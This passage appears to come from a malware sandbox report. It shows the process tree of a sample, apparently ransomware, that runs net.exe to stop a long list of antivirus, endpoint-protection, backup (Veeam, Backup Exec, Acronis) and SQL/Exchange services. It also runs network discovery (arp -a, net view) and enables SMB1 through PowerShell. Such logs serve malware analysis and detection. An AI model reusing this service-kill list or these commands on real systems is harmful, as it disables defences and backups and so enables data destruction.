      4⤵
      PID:2648
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$TPS /y
    3⤵
    PID:6188
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:2080
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
    3⤵
    PID:2348
- C:\Windows\system32\net.exe
  "net.exe" stop MMS /y
  2⤵
  PID:2336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MMS /y
    3⤵
    PID:2520
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:2388
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
    3⤵
    PID:2556
- C:\Windows\system32\net.exe
  "net.exe" stop ekrn /y
  2⤵
  PID:2436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ekrn /y
    3⤵
    PID:2564
- C:\Windows\system32\net.exe
  "net.exe" stop mozyprobackup /y
  2⤵
  PID:2448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mozyprobackup /y
    3⤵
    PID:2572
- C:\Windows\system32\net.exe
  "net.exe" stop EPSecurityService /y
  2⤵
  PID:2480
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPSecurityService /y
    3⤵
    PID:2664
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:2500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2644
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$TPS /y
  2⤵
  PID:2544
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$TPS /y
    3⤵
    PID:2456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:5664
- C:\Windows\system32\net.exe
  "net.exe" stop EPUpdateService /y
  2⤵
  PID:2604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EPUpdateService /y
    3⤵
    PID:1072
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:1604
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:2948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:2328
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
      4⤵
      PID:5732
- C:\Windows\system32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:2924
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:2156
- C:\Windows\system32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:2916
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:2540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:5140
- C:\Windows\system32\net.exe
  "net.exe" stop MBEndpointAgent /y
  2⤵
  PID:2908
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBEndpointAgent /y
    3⤵
    PID:2352
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:4516
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLSERVER /y
  2⤵
  PID:2900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLSERVER /y
    3⤵
    PID:2556
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploySvc /y
  2⤵
  PID:2892
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploySvc /y
    3⤵
    PID:2368
- C:\Windows\system32\net.exe
  "net.exe" stop MBAMService /y
  2⤵
  PID:2884
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MBAMService /y
    3⤵
    PID:2492
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:2876
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:2224
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:2868
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:2528
- C:\Windows\system32\net.exe
  "net.exe" stop masvc /y
  2⤵
  PID:2860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop masvc /y
    3⤵
    PID:2428
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:2852
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:2412
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCloudSvc /y
  2⤵
  PID:2844
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCloudSvc /y
    3⤵
    PID:332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:2948
- C:\Windows\system32\net.exe
  "net.exe" stop macmnsvc /y
  2⤵
  PID:2836
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop macmnsvc /y
    3⤵
    PID:2356
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:2828
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:2080
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamCatalogSvc /y
  2⤵
  PID:2820
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamCatalogSvc /y
    3⤵
    PID:2980
- C:\Windows\system32\net.exe
  "net.exe" stop klnagent /y
  2⤵
  PID:2812
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop klnagent /y
    3⤵
    PID:2256
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:2804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:1604
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBrokerSvc /y
  2⤵
  PID:2796
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBrokerSvc /y
    3⤵
    PID:2084
- C:\Windows\system32\net.exe
  "net.exe" stop kavfsslp /y
  2⤵
  PID:2788
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop kavfsslp /y
    3⤵
    PID:2572
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:2780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:1944
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamBackupSvc /y
  2⤵
  PID:2772
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamBackupSvc /y
    3⤵
    PID:2588
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFSGT /y
  2⤵
  PID:2764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFSGT /y
    3⤵
    PID:2316
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:2756
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:2460
- C:\Windows\system32\net.exe
  "net.exe" stop SQLWriter /y
  2⤵
  PID:2748
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLWriter /y
    3⤵
    PID:2380
- C:\Windows\system32\net.exe
  "net.exe" stop KAVFS /y
  2⤵
  PID:2740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop KAVFS /y
    3⤵
    PID:2600
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:2732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:2288
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:2724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:2096
- C:\Windows\system32\net.exe
  "net.exe" stop FA_Scheduler /y
  2⤵
  PID:2716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop FA_Scheduler /y
    3⤵
    PID:2408
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:2708
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:2348
- C:\Windows\system32\net.exe
  "net.exe" stop SDRSVC /y
  2⤵
  PID:2700
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SDRSVC /y
    3⤵
    PID:2308
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
      4⤵
      PID:4188
- C:\Windows\system32\net.exe
  "net.exe" stop ESHASRV /y
  2⤵
  PID:2692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ESHASRV /y
    3⤵
    PID:2576
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:2684
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
      4⤵
      PID:5832
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:2676
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:2404
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:2464
- C:\Windows\system32\arp.exe
  "arp" -a
  2⤵
  PID:2620
- C:\Windows\system32\net.exe
  "net.exe" stop EhttpSrv /y
  2⤵
  PID:2240
- C:\Windows\system32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:2184
- C:\Windows\system32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:2152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SMTPSvc /y
    3⤵
    PID:5056
- C:\Windows\system32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:1496
- C:\Windows\system32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:588
- C:\Windows\system32\net.exe
  "net.exe" start upnphost /y
  2⤵
  PID:324
- C:\Windows\system32\net.exe
  "net.exe" stop bedbg /y
  2⤵
  PID:1976
- C:\Windows\system32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:524
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:5168
- C:\Windows\system32\net.exe
  "net.exe" stop ntrtscan /y
  2⤵
  PID:2564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ntrtscan /y
    3⤵
    PID:2800
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamEnterpriseManagerSvc /y
  2⤵
  PID:1568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:576
- C:\Windows\system32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:2992
- C:\Windows\system32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:3060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:3244
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:2652
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:3052
- C:\Windows\system32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:2600
- C:\Windows\system32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:3000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:3652
- C:\Windows\system32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:2644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:4428
- C:\Windows\system32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:2140
- C:\Windows\system32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:3056
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:5440
- C:\Windows\system32\net.exe
  "net.exe" stop ReportServer$SQL_2008 /y
  2⤵
  PID:2260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
    3⤵
    PID:5712
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:2288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:5028
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQLServerADHelper /y
  2⤵
  PID:2160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQLServerADHelper /y
    3⤵
    PID:6172
- C:\Windows\system32\cmd.exe
  "cmd.exe" /c net view
  2⤵
  PID:2396
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:4572
- C:\Windows\system32\net.exe
  "net.exe" stop “aphidmonitorservice” /y
  2⤵
  PID:1312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “aphidmonitorservice” /y
    3⤵
    PID:6196
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamHvIntegrationSvc /y
  2⤵
  PID:2244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
    3⤵
    PID:6404
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeadtopology /y
  2⤵
  PID:2720
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeadtopology /y
    3⤵
    PID:6212
- C:\Windows\system32\net.exe
  "net.exe" stop EsgShKernel /y
  2⤵
  PID:2124
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop EsgShKernel /y
    3⤵
    PID:5156
- C:\Windows\system32\net.exe
  "net.exe" stop mfemms /y
  2⤵
  PID:2376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfemms /y
    3⤵
    PID:5808
- C:\Windows\system32\net.exe
  "net.exe" stop mfevtp /y
  2⤵
  PID:1728
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfevtp /y
    3⤵
    PID:6432
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2972
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:4212
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:1068
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:1568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:4068
- C:\Windows\system32\net.exe
  "net.exe" stop sms_site_sql_backup /y
  2⤵
  PID:2744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sms_site_sql_backup /y
    3⤵
    PID:5840
- C:\Windows\system32\net.exe
  "net.exe" stop RESvc /y
  2⤵
  PID:2920
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RESvc /y
    3⤵
    PID:6116
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:2576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:5856
- C:\Windows\system32\net.exe
  "net.exe" stop McShield /y
  2⤵
  PID:2696
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McShield /y
    3⤵
    PID:6156
- C:\Windows\system32\net.exe
  "net.exe" stop MSOLAP$TPSAMA /y
  2⤵
  PID:2580
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
    3⤵
    PID:6204
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:2248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:2764
- C:\Windows\system32\net.exe
  "net.exe" stop OracleClientCache80 /y
  2⤵
  PID:2384
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop OracleClientCache80 /y
    3⤵
    PID:6844
- C:\Windows\system32\net.exe
  "net.exe" stop SepMasterService /y
  2⤵
  PID:2520
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SepMasterService /y
    3⤵
    PID:5632
- C:\Windows\system32\net.exe
  "net.exe" stop ARSM /y
  2⤵
  PID:2452
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ARSM /y
    3⤵
    PID:6628
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos MCS Client” /y
  2⤵
  PID:2404
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos MCS Client” /y
    3⤵
    PID:6776
- C:\Windows\system32\net.exe
  "net.exe" stop msexchangeimap4 /y
  2⤵
  PID:2412
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop msexchangeimap4 /y
    3⤵
    PID:6464
- C:\Windows\system32\net.exe
  "net.exe" stop “intel(r) proset monitoring service” /y
  2⤵
  PID:2444
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
    3⤵
    PID:6284
- C:\Windows\system32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:2992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBIDPService /y
      4⤵
      PID:4020
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SOPHOS /y
  2⤵
  PID:2528
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
    3⤵
    PID:4116
- C:\Windows\system32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2492
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:6900
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:2476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:7120
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:340
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:4020
- C:\Windows\system32\net.exe
  "net.exe" stop sacsvr /y
  2⤵
  PID:2888
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sacsvr /y
    3⤵
    PID:6236
- C:\Windows\system32\net.exe
  "net.exe" stop SAVAdminService /y
  2⤵
  PID:2092
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVAdminService /y
    3⤵
    PID:6452
- C:\Windows\system32\net.exe
  "net.exe" stop SAVService /y
  2⤵
  PID:2228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SAVService /y
    3⤵
    PID:6220
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$ECWDB2 /y
  2⤵
  PID:1744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
    3⤵
    PID:5944
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$SYSTEM_BGC /y
  2⤵
  PID:2552
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:2468
- C:\Windows\system32\net.exe
  "net.exe" stop audioendpointbuilder /y
  2⤵
  PID:2364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop audioendpointbuilder /y
    3⤵
    PID:6576
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$ECWDB2 /y
  2⤵
  PID:1424
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
    3⤵
    PID:7044
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$CXDB /y
  2⤵
  PID:588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$CXDB /y
    3⤵
    PID:6300
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:3120
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:5556
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPSAMA /y
  2⤵
  PID:3168
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
    3⤵
    PID:1508
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update /y
  2⤵
  PID:3176
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update /y
    3⤵
    PID:6228
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
  2⤵
  PID:3184
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:6532
- C:\Windows\system32\net.exe
  "net.exe" stop swi_update_64 /y
  2⤵
  PID:3192
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_update_64 /y
    3⤵
    PID:6316
- C:\Windows\system32\net.exe
  "net.exe" stop swi_service /y
  2⤵
  PID:3160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_service /y
    3⤵
    PID:6736
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$TPS /y
  2⤵
  PID:3152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$TPS /y
    3⤵
    PID:6648
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROD /y
  2⤵
  PID:3216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROD /y
    3⤵
    PID:5380
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:3232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:5788
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:3272
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:6332
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:3280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:4644
- C:\Windows\system32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:3264
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:4556
- C:\Windows\system32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:3288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:6268
- C:\Windows\system32\net.exe
  "net.exe" stop SQLAgent$VEEAMSQL2012 /y
  2⤵
  PID:3304
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:6292
- C:\Windows\system32\net.exe
  "net.exe" stop “Acronis VSS Provider” /y
  2⤵
  PID:3296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
    3⤵
    PID:1128
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$PROD /y
  2⤵
  PID:3256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$PROD /y
    3⤵
    PID:6252
- C:\Windows\system32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:3248
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:5656
- C:\Windows\system32\net.exe
  "net.exe" stop SmcService /y
  2⤵
  PID:3240
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SmcService /y
    3⤵
    PID:5580
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /
  2⤵
  PID:3336
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
    3⤵
    PID:6308
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:3328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:6828
- C:\Windows\system32\net.exe
  "net.exe" stop SQLBrowser /y
  2⤵
  PID:3344
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLBrowser /y
    3⤵
    PID:4068
- C:\Windows\system32\net.exe
  "net.exe" stop Antivirus /y
  2⤵
  PID:3320
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Antivirus /y
    3⤵
    PID:6260
- C:\Windows\system32\net.exe
  "net.exe" stop TmCCSF /y
  2⤵
  PID:3312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop TmCCSF /y
    3⤵
    PID:6584
- C:\Windows\system32\net.exe
  "net.exe" stop Smcinst /y
  2⤵
  PID:3224
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Smcinst /y
    3⤵
    PID:6340
- C:\Windows\system32\net.exe
  "net.exe" stop ShMonitor /y
  2⤵
  PID:3208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ShMonitor /y
    3⤵
    PID:6276
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:3200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:6892
- C:\Windows\system32\net.exe
  "net.exe" stop tmlisten /y
  2⤵
  PID:3352
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop tmlisten /y
    3⤵
    PID:6784
- C:\Windows\system32\net.exe
  "net.exe" stop swi_filter /y
  2⤵
  PID:3144
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop swi_filter /y
    3⤵
    PID:6244
- C:\Windows\system32\net.exe
  "net.exe" stop MSSQL$SBSMONITORING /y
  2⤵
  PID:3368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
    3⤵
    PID:7084
- C:\Windows\system32\net.exe
  "net.exe" stop “Sophos Agent” /y
  2⤵
  PID:3400
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop “Sophos Agent” /y
    3⤵
    PID:5448
- C:\Windows\system32\net.exe
  "net.exe" stop AVP /y
  2⤵
  PID:3432
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AVP /y
    3⤵
    PID:6836
- C:\Windows\system32\net.exe
  "net.exe" stop SQLSafeOLRService /y
  2⤵
  PID:3440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SQLSafeOLRService /y
    3⤵
    PID:6356
- C:\Windows\system32\net.exe
  "net.exe" stop mssql$vim_sqlexp /y
  2⤵
  PID:3512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
    3⤵
    PID:6792
- C:\Windows\system32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:3540
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:7036
- C:\Windows\system32\net.exe
  "net.exe" stop svcGenericHost /y
  2⤵
  PID:3604
